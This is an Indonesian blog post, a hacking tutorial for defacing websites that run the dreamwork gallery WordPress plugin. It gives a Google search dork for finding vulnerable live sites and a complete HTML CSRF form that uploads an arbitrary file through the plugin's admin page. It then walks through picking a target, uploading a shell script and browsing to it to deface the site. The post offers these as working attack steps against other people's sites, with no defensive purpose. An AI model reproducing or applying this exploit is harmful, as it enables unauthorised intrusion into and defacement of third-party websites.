Cara deface Poc arbitrary dreamwork galery uploader+Live Target

Hallo guys:D


Asalamualaikum wr wb. Guys berhubung gw lagi gk ada kerjaan lagi gw sempetin dah nge blog lagi, dan pastinya itu tutor pepes, Kali ini gw membagikan tutor deface Poc arbitrary dreamwork galery uploader, cara ini sih lumayan mudah ya, ok lgsg aja liat tutor gw ya guys.

Siapkan bahan²nya dulu guys

-dork

inurl:/wp-content/plugins/wp-dreamworkgallery

-Live Target


-csrf

<form action="http:/target.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" /> <input type="submit" value="Submit" /> </form>

Copy kode di atas dengan extensi .html

Note: yg saya warnai itu ganti dengan target lu ya!

Ok pertama nge dork dulu ya di gugel

Nah klo udh nge dork tinggal pilih web yg mau di deface,ciri² vuln ada kode xml seperti di gambar.


Nah setelah punya target tinggal masukin target ke csrf, setelah itu buka csrf nya, lalu tinggal upload sc, Nah klo klo kyk gambar di bawah ini berati sukses upload sc nya.



Cara aksesnya gimana? Tinggal copy kode yg saya garis bawahi seperti gambar di atas, Nahh setelah itu copykan kode itu ke belakang web nya,Dan berhasil di deface deh.


Klo masih bingung bisa tonton video di bawah ini.



Sekian dari saya wasalamualaikum wr wb.




Post a Comment

4 Comments